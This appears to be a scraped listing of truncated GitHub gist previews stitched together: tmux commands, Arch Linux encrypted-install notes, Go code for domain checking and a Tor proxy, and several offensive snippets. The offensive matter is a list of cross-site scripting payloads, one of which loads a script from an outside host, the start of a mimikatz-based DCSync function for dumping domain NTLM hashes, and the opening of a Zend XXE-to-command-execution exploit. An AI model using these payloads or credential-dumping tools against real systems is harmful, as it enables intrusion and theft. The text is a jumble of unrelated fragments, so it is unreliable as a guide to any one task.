start new:
tmux
start new with session name:
tmux new -s myname
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> | |
'';!--"<XSS>=&{()} | |
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-" | |
<script/src=data:,alert()> | |
<marquee/onstart=alert()> | |
<video/poster/onerror=alert()> | |
<isindex/autofocus/onfocus=alert()> | |
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> | |
<IMG SRC="javascript:alert('XSS');"> | |
<IMG SRC=javascript:alert('XSS')> |
# Install ARCH Linux with encrypted file-system and UEFI | |
# The official installation guide (https://wiki.archlinux.org/index.php/Installation_Guide) contains a more verbose description. | |
# Download the archiso image from https://www.archlinux.org/ | |
# Copy to a usb-drive | |
dd if=archlinux.img of=/dev/sdX bs=16M && sync # on linux | |
# Boot from the usb. If the usb fails to boot, make sure that secure boot is disabled in the BIOS configuration. | |
# Set swedish keymap |
function Invoke-DCSync | |
{ | |
<# | |
.SYNOPSIS | |
Uses dcsync from mimikatz to collect NTLM hashes from the domain. | |
Author: @monoxgas | |
Improved by: @harmj0y |
#!/bin/sh | |
# | |
# `7MN. `7MF' | |
# __, MMN. M | |
#`7MM M YMb M pd""b. | |
# MM M `MN. M (O) `8b | |
# MM M `MM.M ,89 | |
# MM M YMM ""Yb. | |
#.JMML..JML. YM 88 | |
# (O) .M' |
This turns https://www.sec-consult.com/files/20120626-0_zend_framework_xxe_injection.txt | |
into a Remote Command Execution: | |
NOTE: It relies on the PHP expect module being loaded | |
(see http://de.php.net/manual/en/book.expect.php) | |
joern@vbox-1:/tmp$ cat /var/www/server.php | |
<? | |
require_once("/usr/share/php/libzend-framework-php/Zend/Loader/Autoloader.php"); | |
Zend_Loader_Autoloader::getInstance(); |
// Please use the package https://github.com/chmike/domain as is it maintained up to date with tests. | |
// checkDomain returns an error if the domain name is not valid. | |
// See https://tools.ietf.org/html/rfc1034#section-3.5 and | |
// https://tools.ietf.org/html/rfc1123#section-2. | |
func checkDomain(name string) error { | |
switch { | |
case len(name) == 0: | |
return nil // an empty domain name will result in a cookie without a domain restriction | |
case len(name) > 255: |
// To the extent possible under law, the Yawning Angel has waived all copyright | |
// and related or neighboring rights to orhttp_example, using the creative | |
// commons "cc0" public domain dedication. See LICENSE or | |
// <http://creativecommons.org/publicdomain/zero/1.0/> for full details. | |
package main | |
import ( | |
// Things needed by the actual interface. | |
"golang.org/x/net/proxy" |
# OBJECTIVE: Install Arch Linux with encrypted root and swap filesystems and boot from UEFI. | |
# Note this encrypted installation method, while perfectly correct and highly secure, CANNOT support encrypted /boot and | |
# also CANNOT be subsequently converted to support an encrypted /boot!!! A CLEAN INSTALL will be required! | |
# Therefore, if you want to have an encrypted /boot or will want an encrypted /boot system at some point in the future, | |
# please ONLY follow my encrypted /boot installation guide, which lives here: |